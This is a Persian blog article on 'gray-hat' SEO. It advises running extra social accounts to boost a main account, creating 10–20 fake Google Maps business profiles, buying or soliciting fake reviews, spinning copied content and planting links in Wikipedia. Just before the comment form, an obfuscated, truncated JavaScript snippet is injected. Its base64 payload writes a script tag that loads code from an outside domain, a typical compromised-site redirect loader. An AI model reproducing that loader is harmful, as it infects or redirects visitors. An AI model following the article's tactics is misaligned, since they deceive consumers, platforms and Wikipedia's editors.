بدون دیدگاه
2019/10/01
1286 بازدید

راهنمای جامع سئو کلاه خاکستری + ترفند

در این مقاله می خواهیم به طور کامل به آموزش سئوکلاه خاکستری بپردازیم. همانطور که می دانید سئو تکنیک های مختلفی دارد که هر کدام تاثیرات متفاوتی در رتبه گرفتن وب سایت ها دارند. اگر بخواهیم سئو را دسته بندی کنیم می توانیم بگوییم فعالیت های سئو به قسمت های کلاه سفید، کلاه خاکستری و کلاه سیاه تقسیم می شود. تکنیک هایی که از نظر گوگل قانونی هستند در دسته کلاه سفید و تکنیک هایی که طبق دستورالعمل گوگل باید از آنها اجتناب شود در دسته کلاه سیاه قرار می گیرند. اما سئو کلاه خاکستری به کدام فعالیت ها گفته می شود؟

گاهی اوقات مرزهای بین سئو کلاه سفید، خاکستری و سیاه بسیار گیج کننده است. در مقاله امروز ویکی دمی تصمیم داریم تکنیک های سئو کلاه خاکستری را بررسی کنیم که احتمالا می تواند نظر شما را جلب کند پس خواندن این مقاله را از دست ندهید تا تکنیک های موثر این قسمت از سئو را کشف کنید.

در مقاله‌ای دیگر در مورد سئو کلاه سیاه و سفید توضیحاتی را در اختیار شما قرار دادیم که در آینده در مورد هر کدام از این روش های سئو مقاله ای جدا همراه با تکنیک های هر روش را توضیح خواهیم داد.

آموزش سئو کلاه خاکستری

سئو کلاه خاکستری چیست

اگر سئو را به دنیای ما انسان ها تشبیه کنیم، در سئو هم آدم خوب داریم و هم آدم بد؛ و حتی یه سری آدم داریم که واقعا نه خوبند و نه بد. مثل فیلم “خوب بد زشت ” ،اگه بخواهیم نام گذاری کنیم من به سئو خاکستری لقب زشت را می‌دهم.

سئو کلاه سفید آدم خوب این دنیاست. این فعالیت های درست شامل استفاده صحیح از تگ های متا، تحقیق در رابطه با کلمات کلیدی، تولید محتوای بهینه، بهبود سرعت لود، معماری وب سایت، ایجاد لینک کلاه سفید و غیره است یعنی هرچیزی که مطابق الگوریتم ها و قوانین گوگل باشد و اصلا به فکر این نباشد که چگونه گوگل را دور بزند. در سئو کلاه سفید، حتی ریسک همچین کاری هم قابل درک نیست و هر کاری حتی حس کلاه سیاه را ایجاد کند ممنوع است و باید از آن پرهیز کرد.

سئو کلاه سیاه همان آدم بد داستان است. معمولاً فعالیت های سئو کلاه سیاه برخلاف قوانین موتورهای جستجو است و سعی در دستکاری رتبه ها دارد. مواردی شامل خریدن لینک، پنهان کاری، سیگنال های جعلی و غیره از فعالیت های مربوط به سئو کلاه سیاه هستند.

بر خلاف سئو کلاه سفید، در سئو کلاه سیاه کارهایی انجام میشود که دقیقا مخالف قوانین موتورهای جستجو است واستراتژی که چیده می‌شود در راستای دور زدن موتور های جستجو است.
ریسک سئو کلاه سیاه به شدت بالا است و واقعا توصیه می‌کنم که کسی از این روش های استفاده نکند.

تنها مزیتی که سئو کلاه سیاه دارد، زود بازده بودن آن است اما زود بازده بودن به چه قیمتی؟ لطفا اگر در ابتدای مسیر سئو هستید همگام با یاد گرفتن اصول سئو، یاد بگیرید که باید در سئو صبور باشید و صبر کردن را تمرین کنید.

خب بریم سراغ سئو خاکستری که آدم زشت دنیای ماست و جذابیت های خیلی زیادی داره. این فعالیت ها به روش هایی گفته می شود که توسط موتورهای جستجو کاملاً رد نشده اند اما هنوز سفید به حساب نمی آیند. دلیل وجود سئو کلاه خاکستری این است که دستورالعمل های موتورهای جستجو واضح و روشن نیستند یا در این دستورالعمل ها مواردی عنوان نشده است. به عنوان مثال خرید دامنه های منقضی شده، تغییر اکانت های رسانه های اجتماعی و سایر مواردی که در این مقاله ویکی دمی بررسی خواهیم کرد از دسته فعالیت های سئو خاکستری هستند. واکنش های متفاوتی نسبت به سئوی کلاه خاکستری وجود دارد و ممکن است برای عده ای سفید و یا برای عده ای سیاه باشد و من فکر می کنم در مورد این مقاله هم به همین شکل باشد. ممکن است برخی، روش های معرفی شده در این پست را سیاه و برخی دیگر آنها را کاملاً سفید در نظر بگیرند. برای نتیجه گیری می توان دوباره به دستورالعمل ها و راهنماهای موتورهای جستجو مراجعه کرد البته اگر فرض کنیم که اطلاعات دقیقی در رابطه با موضوع خاص مدنظر ما وجود داشته باشد.

ذکر این نکته هم الزامیه که در بعضی از شرایط سئو کارانی که از کلاه خاکستری استفاده میکنن گاهی اوقات فاکتورهای سئو سیاه را به روش های ایمن تری پیاده سازی می‌کنند به نحوی که شامل جریمه گوگل نشن.
مثلا پیاده سازی PBN به روش درست یکی از تکنیک های کلاه خاکستری است در صورتی که خود PBN یک روش کلاه سیاه است. برای آشنایی بیشتر با تکنیک PBN مقاله آموزش ساخت pbn را مطالعه کنید.

سئو کلاه خاکستری

 

مزایا و معایب سئو کلاه خاکستری

بزرگترین مزیت استفاده از این سئو این است که می توان سریعتر و راحت تر از سئو سفید رتبه گرفت. برخی ترجیح می دهند این روش سئو را کنار نگذارند تا وقتی که روش های بی خطر آن برای گرفتن نتایج عالی در دسترس هستند. تبدیل این سئو به کلاه سفید مشکلی است که در این فعالیت ها وجود دارد و ممکن است موتورهای جستجو آن ها را به عنوان روش های سیاه شناسایی کنند. گاهی مواقع این فعالیت ها می توانند بدون توجه موتورهای جستجو به نتیجه برسند و البته مواقع دیگر وقتی خیلی زیاد استفاده شوند مورد توجه آنها قرار گرفته و رد می شوند.

با توجه به دستورالعمل های گوگل وب مستر باید از تکنیک های زیر اجتناب شود:

سئو سیاه

 • محتواهایی که به شکل خودکار تولید شده اند

هر محتوایی که با روش های برنامه نویسی ایجاد شده باشد مانند ترجمه متون، ترکیب آنها و … که فعالیت انسانی به شمار نمی‌آید و ربات این فرایند را انجام میدهد.

 • لینک های شراکتی

خرید و فروش لینک ها، مبادلات بیش از اندازه لینک ها، برنامه هایی که به صورت خودکار لینک ایجاد می کنند.

 • ایجاد صفحات بدون محتوا یا محتوای خیلی کم

سایت هایی وجود دارند که قبل از اینکه محتوایی تولید کنند، صفحه‌ی آن محتوا را میسازند تا قبل از آماده شدن محتوا، صفحه مورد نظر ایندکس شده باشد و رتبه ای گرفته باشد که این کار درستی نیست.

یا تعدادی از سایت ها که برای کلمات زیادی صفحه با محتوا های خیلی کم میسازند تا در سرچ بسیاری از کلمات رتبه بگیرند که گوگل این موارد را می‌فهمد.

شاید خواندن این مقالات برای شما مفید باشد:

راهکارهای سئو و بهترین تکنیک های سئو ۲۰۱۹

خدمات سئو و بهینه سازی سایت

 • پنهان کاری

نمایش محتوای متفاوت به کاربران و اسپایدرهای گوگل، یعنی محتواهایی مثلا به گوگل نمایش داده میشود که کاربران آن محتواها را نمی‌بینند. این یکی از فاکتور های کلاه سیاه است و به cloaking معروف است که این کار را برای افزایش رتبه و فریب دادن موتور های جستجو انجام میدهند.

Gray seo

 • تغییر مسیرهای دزدانه
  تفاوت صفحات doorway، orphan و dead end

ارسال یک بازدیدکننده به یک URL متفاوت از چیزی که درخواست کرده است.

 • صفحات doorway

صفحاتی هستند که صرفاً با هدف کسب رتبه برای تعدادی از کلمات کلیدی ایجاد شده اند. برای آشنایی بیشتر بیشتر با صفحات doorway مقاله منظور از doorway page چیست و چرا گوگل به آن حساس است؟ را مطالعه کنید.

 • محتواهای کپی شده

یکی از شاخص هایی که ربات های گوگل برای رتبه بندی سایت ها در نظر می گیرند محتوای با کیفیت استفاده شده در سایت ها می باشد. گوگل به راحتی قادر به شناسایی محتوای کپی می باشد. حتی می تواند این را تشخیص دهد که محتوا ابتدا توسط چه سایتی منتشر شده است. بنابراین برای بدست آوردن یک رتبه خوب در صفحه جست و جوی گوگل و جریمه نشدن توسط گوگل از محتواهای کپی به هیچ عنوان استفاده نکنید.

 • صفحات لندینگ با کلمات کلیدی غیرمرتبط

صفحات Landing page نقش زیادی در موفقیت یک وبسایت دارد. پس سعی کنید صفحات لندیگ پیج وبسایتتان را مطابق با نیاز کاربر طراحی کنید. در صفحات فرود وبسایت از کلمه کلیدی و کلمات LSI استفاده کنید و به هیچ عنوان از کلمات غیر مرتبط با موضوع اصلی صفحه و آنچه کاربر جست و جو کرده و به دنبال آن بوده استفاده نکنید. در مقاله landing page یا همان صفحه فرود چیست و چگونه آن را ایجاد کنیم؟ به طور مفصل در مورد نکات مهم طراحی صفحات فرود صحبت کردیم.

البته هنوز کسانی هستند که راه هایی برای انعطاف پذیری برخی از قوانین پیدا می کنند و آنها را خاکستری می نامند. استفاده از این روش ها به عنوان تکنیک های سئو خاکستری خطرات زیادی دارد هرچند می تواند مزایای بزرگی هم به همراه داشته باشد.

سئو Gray

تکنیک های سئو کلاه خاکستری

در این بخش به معرفی تکنیک های سئو کلاه خاکستری میپردازیم. لطفا هنگام استفاده از هرکدام از این تکنیک ها مراقب باشید آنها را کلاه سیاه جلوه ندهید که مشکلی برای شما به وجود نیاد.

خرید دامنه های منقضی شده

اولین تکنیک سئو کلاه خاکستری که در این مقاله به سراغ آن رفته ایم بسیار قدرتمند است، البته اگر به درستی استفاده شود. معمولاً گزینه های متفاوتی برای استفاده از دامنه های منقضی شده وجود دارد.
یکی از فاکتور های خیلی مهم در ساخت بک لینک PBN همین دامنه های رنک دار است. البته نباید هر دامنه‌ی رنک داری را بخرید و باید به سابقه آن دامنه توجه داشته باشید که فعالیت اسپم نداشته باشد.

ساخت ریدایرکت های 301

کد وضعیت 301 به کاربران اعلام می کند که یک صفحه به طور دائم به یک آدرس جدید منتقل شده است. این کد به گوگل کمک می کند که کاربران را به صفحه جدید هدایت کنند و یکی از روش های معمول برای استفاده از این نوع دامنه هاست. اما اگر یکی از این دامنه ها قبلا توسط گوگل جریمه شده باشد می تواند روش پرخطری برای شما باشد. برای آشنایی بیشتر با انواع ریدایرکت ها پیشنهاد می کنیم مقاله ریدایرکت چیست؟ آموزش کامل ریدایرکت ها را حتما مطالعه کنید.

تکنیک های سئو کلاه خاکستری

حفظ دامنه و ایجاد لینک به صفحات موردنظر

اگر دامنه منقضی شده مورد اعتماد است می توانید برای اهداف دیگر این دامنه را به شکل سابق حفظ کرده و لینک هایی از این دامنه به صفحات موردنظرتان ایجاد کنید. در این گزینه شما فقط استفاده کمی از قدرت دامنه دارید اما این کار امن تر از موارد دیگر است.

 • یک صفحه لندینگ در دامنه موردنظر ایجاد کنید و بازدیدکنندگان آن را به وب سایت خود هدایت کنید:

اگر دامنه موردنظر در همان دسته کسب و کار شما باشد می توانید از کاربران بخواهید به جای این دامنه از وب سایت شما بازدید کنند. این روش هم خیلی مودبانه است و هم برای اطلاع رسانی به کاربرانی به کار می رود که امکان استفاده از سرویس قبلی را ندارد و آنها را به یک سرویس مشابه راهنمایی می کند. این کار امن است اما به ترافیک زیادی نیاز دارد.

آموزش SEO

بهتر است قبل از تصمیم به خرید دامنه چند مورد را بررسی کنید:

 • آیا به کسب و کار شما مرتبط است؟

اولین و مهمترین سوال در خرید یک دامنه، مرتبط بودن آن به کسب و کار و هدف شماست. به دنبال دامنه ای باشید که مشابه همان کاری باشد که شما انجام می دهید. مثلاً اگر شما فعال در صنعت فناوری هستید طبیعی است که خرید یک دامنه مربوط به لوازم آرایشی کمک زیادی به شما نمی کند. گوگل به این نکته توجه زیادی دارد و همچنین توجه داشته باشید که میزان قابل اعتماد بودن وب سایت شما از لینک های ورودی آن تاثیر می گیرد.

 • آیا این دامنه قبلاً جریمه شده است؟

ابتدا دامنه را در گوگل جستجو کنین و نتیجه را بررسی کنید. با هر روشی که امکان دارد دامنه را برسی کنید و بفهمید این دامنه قبلا جریمه شده است یا خیر. لینک گرفتن از سایت هایی که جریمه شده اند ممکن است برای شما مخرب باشد.

کلاه خاکستری در سئو

 • برسی اوضاع قبلی دامنه

با استفاده از https://archive.org می توانید وضعیت قبلی یک دامنه را بررسی کنید و ببینید وب سایت به چه شکلی بوده است. این ابزار از یک دامنه در زمان های مختلف یک اسکرین شات می گیرد و آنها را ذخیره می کند. آخرین مورد را بارگزاری کنید و بررسی کنید که به اندازه کافی خوب باشد.

 • بررسی ترافیک دامنه

برای بررسی ترافیک ارگانیک یک دامنه می توانید از Ahref استفاده کنید. اگر دامنه را خریداری کرده اید و یا به آن دسترسی دارید به archive.org بروید و نسخه قدیمی صفحه اصلی آن را آپلود کنید و بعد گوگل آنالتیکس را راه اندازی کنید و ترافیک سایت را رهگیری کنید. اگر حجم ترافیک خیلی کم است بهتر است از خرید دامنه صرف نظر کنید.

 • اکانت های شبکه های اجتماعی

احتمالا از اهمیت شبکه های مجازی برای ارتقاء کسب و کارها اطلاع دارید. داشتن چند اکانت در شبکه های اجتماعی یک راه عالی برای تولید ترافیک برای وب سایت شماست. تنها کاری که باید انجام دهید این است که تعدادی (البته تعداد کمی) اکانت با تصویر و بیوگرافی بسازین و برای این اکانت ها تبلیغ کنید. به عنوان مثال تصور کنید که شما یک اکانت تجاری مخصوص کسب و کار خود در توییتر دارید، می توانید دو اکانت دیگر هم ایجاد کنید که به حساب اصلی شما لایک و ریتوییت بدهید.

از دیگران ارتباط بگیرید و مطالبی را به اشتراک بگذارید. اکانت ها می توانند با هم هم پوشانی داشته باشند اما بهتر است بین آنها تنوع ایجاد شود. به عنوان مثال اگر اکانت اصلی شما در زمینه هنر فعالیت می کند، بهتر است اکانت های دیگر مربوط به موسیقی، طراحی یا بخش های دیگری از هنر باشند. این کار بسیار مفید است زیرا مرزهای جستجو اصلی شما را گسترش می دهد.

برای مدیریت این اکانت ها می توانید از یک ابزار مدیریت شبکه های اجتماعی مثل بافر یا هوت سوت استفاده کنید. البته این کار نیاز به تلاش و مشارکت زیادی دارد اما تا زمانی که خودتان این کار انجام دهید (و نه مثلا روبات ها) می تواند یک فعالیت خاکستری بی دردسر باشد.

  سئو چیست
سئو gray
 • ساخت لینک چند لایه

هرچند ممکن است این کار در دسته سئوی کلاه سیاه قرار بگیرد اما اگر تعداد لینک هایی که به سایت هدف ایجاد می کنید زیاد نباشد و همچنین لینک های ایجاد شده از نوع لایه اول و با کیفیت بالا باشند می توان آن را خاکستری لحاظ کرد، هرچند تا چند سال پیش این تکنیک سئوی کلاه سفید حساب می شد.

بک لینک های ردیف اول

ردیف اول لینک هایی هستند که مستقیماً به وب سایت هدف شما اشاره می کنند. بهتر است این لینک ها از طریق سایت های معتبر ایجاد شوند و تا حدممکن با کیفیت باشند. ساخت صفحات با کیفیت برای این لایه نکته بسیار مهمی است، باید صفحه ای با بیش از 500 کلمه داشته باشید که محتوای تصویری هم حتما داشته باشد. توجه داشته باشید که قبل از ایجاد این نوع لینک ها، وب سایت شما باید حداقل صفحاتی مانند شرایط استفاده از سایت، حفظ حریم کاربری و صفحه تماس را داشته باشد.
اصلی ترین بخش بک لینک های هرمی را بخش لایه اصلی یا همان لایه اول شامل میشود پس در ساخت آن دقت کافی را داشته باشید. برای تسلط بر موضوع بک لینک و نحوه‌ی ساخت آن توصیه می‌کنم مقاله آموزش ساخت بک لینک را مطالعه کنید.

بک لینک های ردیف دوم

لینک هایی هستند که به لینک های ردیف اول شما اشاره می کنند. ایده اصلی ایجاد این لینک ها، تقویت لینک های ردیف اول است. موارد استفاده بک لینک های ردیف دوم زیاد و متنوع است. به عنوان مثال: لینک های ویکی، وب سایت های ویدئویی، ثبت مقاله، کامنت ها، دایرکتوری ها و … فقط توجه داشته باشید که به دلیل استفاده زیاد ممکن است این لینک ها اسپم لحاظ شوند. در این ردیف بر عکس ردیف اول می توانید تعداد بیشتری لینک ایجاد کنید اما به هرحال بهتر است از لینک های کمتری که موارد بهتر و با کیفیت تری هستند استفاده کنیم بخاطراینکه این لینک ها برای گوگل اهمیت زیادی دارند. اگر می خواهید سایت خود را تا جایی که ممکن است قابل اعتماد نگه دارید، کافی است فقط 10 تا 20 لینک برای هر یک از لینک های ردیف اول ایجاد کنید و مطمئن باشید که لینک های با کیفیتی هستند.

افزودن ردیف های بیشتر

اصول ساخت لینک در ردیف های بعدی هم مشابه ردیف دوم است، هر ردیف به ردیف بالایی لینک می شود. در ردیف های عمیق تر می توانید از پروفایل های کاربری، نظرات یک وبلاگ یا فروم نیز برای ایجاد لینک استفاده کنید. هرچه ردیف ها پایین تر باشد باید تعداد لینک های ایجاد شده بیشتر باشد. به عنوان مثال در لایه های بعدی باید برای هر لینک لایه قبل حداقل 10 لینک ایجاد شود.

 • ایجاد تغییرات مکرر در وب سایت

تغییر کد وب سایت، متن و فونت ها می تواند باعث شود موتورهای جستجو فکر کنند محتوای وب سایت شما به روز شده است حتی اگر این تغییرات خیلی کم و محدود باشند. با انجام این کار بدون اینکه مطلب جدیدی به وب سایت اضافه کنید می توانید مقداری امتیاز به دست بیاورید. الگوریتم کافئین گوگل امتیاز بیشتری به محتواهای جدید که به تازگی به روز شده اند می دهد.

نرخ و میزان تغییرات و حتی جایی که تغییرات رخ داده تاثیر زیادی در این امتیاز دارد. به عنوان مثال آیا این وب سایت روزانه، هفتگی و یا ماهانه به روز رسانی می شود؟ آیا تغییرات کوچک است یا بزرگ؟ آیا یک پاراگراف تغییر کرده یا کل متن؟ تغییر در کدام قسمت متن انجام شده، در متن اصلی، منو یا غیره؟

 • ارجاع به نقشه گوگل برای سئو محلی

در سئوی محلی یا لوکال سئو، گوگل نسبت به لوکیشن کاربران، نزدیک ترین نتایج را به آنها نمایش می دهد. برخی از کارشناسان سئو پروفایل هایی در لوکیشن های مختلف نقشه گوگل ایجاد می کنند تا در لیست نتایج محلی آن لوکیشن ها هم دیده شوند. در این تکنیک شما باید بین 10 تا 20 پروفایل مربوط به کسب و کار خودتان بسازید و اطلاعات لوکیشن موردنظرتان را در نقشه هر کدام از پروفایل ها ذخیره کنید. این کار باعث می شود که یک شبکه اطراف لوکیشن شما ایجاد شود که همگی به کسب و کار شما هدایت می شوند. البته این تکنیک کلاه خاکستری به تجربه زیادی نیاز دارد و استفاده نادرست از آن می تواند باعث جریمه شدن وب سایت شما شود.

Gray hat

 • نقد و بررسی های جعلی (فِیک)

برای درک این نوع فعالیت سئو، نیاز است که ابتدا تعریفی از co-citation داشته باشیم: ارجاع به یک برند یا وب سایت بدون ایجاد لینک توسط یک یا چند سایت معتبر اصطلاحاً co-citation نامیده می شود.

نقد و بررسی ها، گزینه فوق العاده ای برای بهبود co-citation هستند و با استفاده از آنها می توان یک ارجاع رسمی به سایت ایجاد کرد. اما قبل از این کار وب سایت شما باید در سایت های مرجع و معتبر ثبت شوند. یکی از توصیه هایی که کارشناسان سئو به همه کسب و کارها می کنند این است که وب سایت خود را در لیست های محلی سایت های معتبر مانند گوگل، یاهو، یِلپ (Yelp) و My Business ثبت کنند و البته نظرات خود را هم به آنها اضافه کنند.

تکنیک خاکستری که در اینجا می توان به کار برد این است که از کاربران دیگر درخواست کنید که برای کسب و کار شما در این وب سایت ها نظر بنویسند یا تعدادی نظر بخرید، یعنی بابت نوشتن نقد و بررسی به چند کاربر پول پرداخت کنید.

 • محتواهای Spin

منظور از محتوای اسپین این است که شما  محتوای وب سایت دیگری را بازنویسی می کنید و بعد از ایجاد تغییرات جزئی در آن، محتوا را در سایت خود آپلود می کنید. فقط توجه داشته باشید که کیفیت محتوای اسپین درست مثل تولید محتوای معمولی بسیار مهم است. در ضمن می توانید برای متون انگلیسی ابزاری پیدا کنید که محتوای موردنظر شما را اسپین کند تا محتوای شما به دلیل سرقت ادبی جریمه نشود. حتما قبل از آپلود محتوا را بررسی کنید تا کپی نباشد و با نیازهای شما هم متناسب باشد.

 • صفحه ویکی پدیا

ویکی پدیا ارزش بسیار بالایی دارد و به همین دلیل اکثر کسب و کارها تمایل دارند از آن لینکی به وب سایت خود داشته باشند. با اینکه لینک های ویکی پدیا از نوع nofollow هستند اما همچنان تاثیر زیادی در رتبه بندی گوگل دارند. داشتن لینک در ویکی پدیا می تواند به شما کمک کند تا وارد گراف دانش گوگل شوید.

تکنیک های سئو GRAY

البته این روزها گرفتن لینک از ویکی پدیا کار سخت تری شده است بخاطر اینکه افرادی زیادی در سراسر دنیا این لینک ها را اسپم می کنند. علاوه بر این، هدف اصلی ویکی پدیا این است که یک دایره المعارف باشد نه یک ابزار برای بازاریابی کسب و کارهای آنلاین. تنها در صورتی که ارجاع به سایت شما توسط یک منبع قابل اعتماد صورت بگیرد ویکی پدیا این درخواست را بررسی می کند. اما بیشتر وب سایت ها دارای این استاندارد نیستند تا ویکی پدیا لینک به آنها را تایید کند بنابراین نیاز است که از یک تکنیک خاکستری برای این کار استفاده شود.

  سئو داخلی چیست: آموزش جامع on page seo

یک راه برای ایجاد لینک در ویکی پدیا این است که یک صفحه جدید در ویکی پدیا ایجاد کنید که به وب سایت شما مرتبط باشد و سپس یک لینک به سایت تان بسازید. البته این کار به همین راحتی که عنوان شد نیست و احتمالا ساخت یک صفحه جدید در ویکی پدیا برای موضوعاتی که ارزش بسیار زیادی ندارند و یا قرار نیست به راحتی توجه عموم را جلب کنند بسیار دشوار است. برای راحتی کار از دستورالعمل زیر استفاده کنید:

 • یک موضوع خوب و قابل توجه انتخاب کنید
 • اصلا آن را پیچیده نکنید، باید ساده و مرتبط باشد
 • سعی کنید علاوه بر ساختن لینک به سایت خودتان، لینک های متفاوتی به صفحه ایجاد کنید
 • سعی کنید اصلا تبلیغاتی نباشد
 • دستورالعمل های مربوط به استایل و قالب بندی را دنبال کنید.

اگر این کار برای شما سخت است می‌توانید از خدمات ویکی دمی استفاده کنید. یعنی این کار را به ما بسپارید تا شما را در ویکی پدیا ثبت کنیم . برای اطلاع از تعرفه سئو و پکیج های سئویی می توانید با شماره ۰۹۱۲۲۸۹۰۹۲۴۸تماس بگیرید.

 • بازاریابی افراد تاثیرگذار (اینفلوئنسر مارکتینگ)
تکنیک های SEO خاکستری

اینفلوئنسر مارکتینگ به بازاریابی گفته می شود که در آن از یک شخص معروف و تاثیرگذار یا اصلاحا اینفلوئنسر برای معرفی و ارتقاء کسب و کار استفاده می شود. این نوع بازاریابی فعالیتی کلاه سفید است اما یک نوع خاکستری از آن هم وجود دارد. اینفلوئنسرها افرادی هستند که راحت تر از بقیه به دیگران دسترسی دارند البته منظور اینفلوئنسرهای بزرگ که روی مارکت بزرگتری هم تاثیر دارند نیست بخاطراینکه به احتمال زیاد روش های خاکستری زیر را قبول نمی کنند:

 • تبلیغات

با پرداخت هزینه کم می توانید در وب سایت و یا صفحات این اینفلوئنسرها کسب و کار خود را تبلیغ کنید و ترافیک بیشتری را به وب سایت خود هدایت کنید. حتی اگر در این مرحله از یک لینک no-follow برای تبلیغ استفاده شود این فعالیت به عنوان سئو کلاه سفید لحاظ می شود.

 • ترویج در شبکه های اجتماعی

پروموت های اجتماعی یک روش عالی برای دیده شدن محتواها هستند. استفاده از اکانت فردی که ده ها دنبال کننده دارد درست مثل استفاده از سکوی پرش است. فقط کافی است از اشخاصی استفاده کنید که به کسب و کار شما مرتبط باشند.

 • مصاحبه های پولی

بعضی از اینفلوئنسرها در با دریافت وجه مشخصی برای شما یک مصاحبه در وب سایت شان ترتیب می دهند و برای این کار یک سری سوال و جواب مشخص را به شما ارسال می کنند که با استفاده از آنها می توانید محصول یا سرویس خود را معرفی کنید.

 1. تکرار کلمات کلیدی

همیشه در تولید محتوا در نظر داشته باشید که محتواهای طولانی تر رتبه بهتری می توانند بگیرند، اما چطور می توان از این ویژگی برای رسیدن به ترافیک بیشتر استفاده کرد؟ به جای اینکه مقالات پژوهشی تولید کنید می توانید محتواهایی با استفاده از کلمات کلیدی موردنظرتان بنویسین و پست کنید. ممکن است روش خیلی خوبی نباشد اما می تواند برای موقعیت وب سایت شما در صفحه نتایج جستجوی گوگل مفید باشد.

فعالیت های خاکستری که سئوی کلاه سیاه هستند

سئو gray hat

خوب همراهان عزیز ویکی دمی تا اینجا روش هایی از سئوی کلاه خاکستری را بررسی کردیم که البته در بکارگیری آنها باید دقت زیادی داشته باشید. چند روش سئوی دیگر وجود دارد که ممکن است به نظر دیگران فعالیت های خاکستری باشند اما با توجه به دستورالعمل های گوگل، سئوی کلاه سیاه به حساب می آیند به همین دلیل فقط جهت آشنایی آنها را به شما معرفی می کنیم:

پنهان کاری یا Cloaking

در این تکنیک محتواهایی که به بات های گوگل نمایش داده می شود با محتواهایی که کاربر مشاهده می کند تفاوت دارد. در واقع دو نسخه از محتوا وجود دارد که یکی به گوگل و دیگری به کاربران وب سایت نمایش داده می شود. اگر گوگل تشخیص دهد که یک وب سایت پنهان کاری دارد آن را جریمه کرده و حتما در رتبه آن تاثیر منفی خواهد داشت.

محتواهای تکراری یا Duplicate Content

محتواهای تکراری مانند محتواهای اسپین و کپی شده موضوع شناخته شده ای هستند. محتواهای تکراری برای گوگل مشکلاتی اساسی ایجاد می کنند، مثلاً ممکن است در انتخاب آدرس هایی که حاوی یک محتوای یکسان هستند و نمایش آن در لیست نتایج دچار مشکل شود. اگر از محتواهای اسپین استفاده می کنید مطمئن شوید که متن موردنظر به دلیل تکرار محتوا باعث جریمه شدن وب سایت شما نشود. برای آشنایی کامل تر با مضرات محتوای تکراری در فرآیند بهینه سازی سایت، مقاله مضرات محتوای تکراری در 2020 را مطالعه کنید.

سئو منفی یا Negative SEO

به مجموعه فعالیت های غیراخلاقی گفته می شود که معمولا رقبا برای ضربه زدن به جایگاه یک وب سایت در نتایج جستجو انجام می دهند. سئوی منفی کاملاً امکان پذیر است و اگر به شکل هوشمندانه و پیچیده انجام شود تشخیص آن برای گوگل دشوار است. به عنوان مثال می توان با ایجاد صدها یا هزاران لینک اسپم به یک وب سایت باعث کاهش رتبه آن شد و یا اینکه لینک هایی با کلمات کلیدی غیراخلاقی یا غیرقانونی به یک وب سایت ایجاد شود و باعث کاهش اعتماد گوگل به آن وب سایت شود.

خرید لینک

در دستورالعمل گوگل صراحتاً عنوان شده که خرید بک لینک به عنوان تخلف شناخته می شود. گاهی مواقع کاربران فکر می کنند با خرید لینک می توانند گوگل را فریب داده و رتبه بالاتری بگیرند اما گوگل روش های متنوعی برای تشخیص لینک های خریداری شده دارد که بسیار پیچیده و قدرتمند هستند.

درست مانند هر موضوع دیگری ممکن است افراد متفاوت نظرات متفاوتی هم در رابطه با سئو و تکنیک های آن داشته باشند. اما بهترین کار این است که با توجه به دستورالعمل های گوگل بهترین تکنیک ها را به کار ببریم و از احتمال جریمه شدن وب سایت خود جلوگیری کنیم. خوب دوستان ویکی دمی به پایان این مقاله رسیدیم و امیدوارم از خواندن این مقاله لذت برده باشید. شما با کدام تکنیک های سئو کلاه خاکستری آشنا هستین؟ از کدام یک از آنها تابحال استفاده کرده اید؟ می توانید تکنیک های موردعلاقه خود و تجربیات مربوط به استفاده از آنها را در بخش نظرات با ما به اشتراک بگذارید.

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*
*

4 × 2 =